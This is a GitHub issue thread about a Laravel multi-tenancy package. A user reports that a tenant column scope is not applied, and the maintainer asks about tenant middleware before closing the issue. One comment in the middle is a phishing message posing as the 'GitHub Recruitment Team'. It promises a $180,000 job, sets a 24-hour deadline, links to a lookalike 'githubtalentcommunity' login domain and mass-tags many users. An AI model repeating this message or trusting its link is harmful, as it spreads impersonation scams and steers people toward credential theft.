### ISSUE TITLE
Tenant does not apply

### ISSUE THREAD

**Issue by diegonella** [nunomazer/laravel-samehouse#6]
I can't figure out where the error is

```
class Product extends BaseModel implements HasMedia
{
    use BelongsToTenants;

    public $tenantColumns = ['scheme_id' => 'scheme_id'];

}
```

Controller for check

```
$products = Product::limit(1);
dd(\Landlord::getTenants(), $products->toSql(), $products->first());

```

Ouput

![SCR-20230127-grb](https://user-images.githubusercontent.com/357033/215119965-73ac9095-b09c-4897-9ecd-19c517809580.png)

Can you help me find the problem?

**Comment by nunomazer** [comment]
Hi @diegonella, have you implemented the middleware to set the tenant value for request?

**Comment by cyny39** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
acgnet, @lucasrc98, @CesarNog, @diegosilva789, @robotenique, @renanbirck, @linces, @diegomagikal, @theagosakai, @eurmn, @devtbraga, @GregoriSchuster, @lcmps, @josefelipesouza, @euharrison, @italobb, @ThalesCouto, @vinicius-vph, @rafaeldl, @shuhikari

**Comment by nunomazer** [comment]
Closing since not feedback was done
